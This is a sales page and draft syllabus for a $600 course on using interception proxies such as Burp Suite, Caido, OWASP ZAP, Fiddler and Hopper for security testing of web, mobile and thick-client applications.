Your Cart
Loading

Course Releases Feb 18

Interception Proxies for Modern Security Assessments:


This course is designed to provide in-depth knowledge of interception proxies like Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper. By mastering these tools, you’ll gain the skills necessary to conduct security assessments on modern applications.



What You’ll Learn:

  • Set up and use various interception proxies effectively.
  • Understand the unique strengths and weaknesses of Burp Suite, Caido, OWASP ZAP, Fiddler, and Hopper.
  • Perform security testing on web applications, mobile apps, and thick clients.
  • Explore plugin ecosystems and third-party integrations for advanced capabilities.
  • Analyze real-world case studies of vulnerabilities discovered using interception proxies.

Why Choose This Course?

  • Comprehensive and Tool-Agnostic: Learn multiple tools to tailor your approach based on project needs.
  • Practical Focus: Hands-on labs and real-world case studies ensure you can apply concepts immediately.
  • Expert Guidance: Jhaddix shares proven methods and advanced tips gleaned from years of experience.

Who Should Enroll?

  • Security professionals seeking to expand their toolkit.
  • Penetration testers and bug bounty hunters aiming to deepen their expertise.
  • Developers and QA specialists integrating security into their workflows.
  • Anyone looking to master modern interception proxies for effective security assessments.

What’s Included:

  • Video modules covering theoretical and practical topics.
  • Hands-on labs with real-world scenarios.


** This syllabus is still in draft. It may not represent the full gamut of topics in the final class **




Course Outline:


Module 1: Introduction to Interception Proxies

Why Interception Proxies Are Essential:

  • The role of proxies in application security testing.
  • Practical applications: Debugging, reconnaissance, and exploitation.

Overview of Key Tools:

  • Burp Suite: The industry standard for web application security testing.
  • Caido: A fresh perspective on interception proxies with modern UI/UX.
  • OWASP ZAP: Open-source and highly extensible for community-driven testing.
  • Fiddler: A Powerful tool for analyzing Windows based thick client HTTP/S traffic.
  • Hopper: A brief overview of an alternative for Mac Systems.

Activity:

  • Install and configure the proxy tools to intercept basic web traffic.
  • Discuss "gotchas"

Module 2: Tool-Specific Deep Dives

Burp Suite:

  • Setting up projects, workspaces, and target scoping.
  • Using key tools: Repeater, Intruder, and Scanner.
  • Must-have plugins

Caido:

  • Exploring the modern interface and workflow.
  • Comparison with Burp Suite: Strengths and use cases.

OWASP ZAP:

  • Crawling and passive scanning workflows.
  • Extending functionality with add-ons like Active Scan Rules and HUD.
  • Integrating into automated DAST

Fiddler:

  • Why Fiddler?
  • Capturing and replaying traffic for debugging and testing.
  • A cursory look at FiddlerScript for custom scenarios.

Hopper:

  • Analyzing and intercepting traffic from thick clients.



Module 3: Web Application Testing with Proxies

Workflows for Web Application Testing:

  • Mapping applications with crawlers and manual exploration.
  • Identifying and exploiting common vulnerabilities: XSS, SQLi, CSRF, and more.

Enhancing Productivity:

  • Leveraging automation and macros in Burp Suite and ZAP.
  • Integrating withy command line workflows for testers

Module 4: Mobile Application and Thick Client Testing

Mobile Application Proxying:

  • Setting up proxies for mobile traffic interception.
  • Testing APIs, analyzing insecure storage, and bypassing SSL pinning.

Thick Client Proxying with Hopper and Fiddler:

  • Reverse engineering traffic from proprietary protocols.
  • Analyzing communication channels for security flaws.

Activity:

  • Intercept and analyze API traffic from a mobile application and a thick client.

Module 5: Plugins, Extensions, and Third-Party Integrations

Extending Proxy Capabilities:

  • Key plugins for Burp Suite and ZAP that enhance testing efficiency.
  • Exploring Caido’s ecosystem of integrations.
  • Introduction to fuzzing payload projects.

Integrating Fuzzers and Automation Tools:

  • Using ffuf, wfuzz, and other tools with proxies.


Authentication and Session Handling:

  • Testing authentication flows (OAuth, SAML, JWT). 

Module 6: Case Studies and Advanced Scenarios

Case Studies:

  • Examples of real-world vulnerabilities uncovered using proxies.
  • Creative solutions to challenges like WAFs, Captchas, and rate limiting.

Purchase Interception Proxies for Modern Security Assessments

$600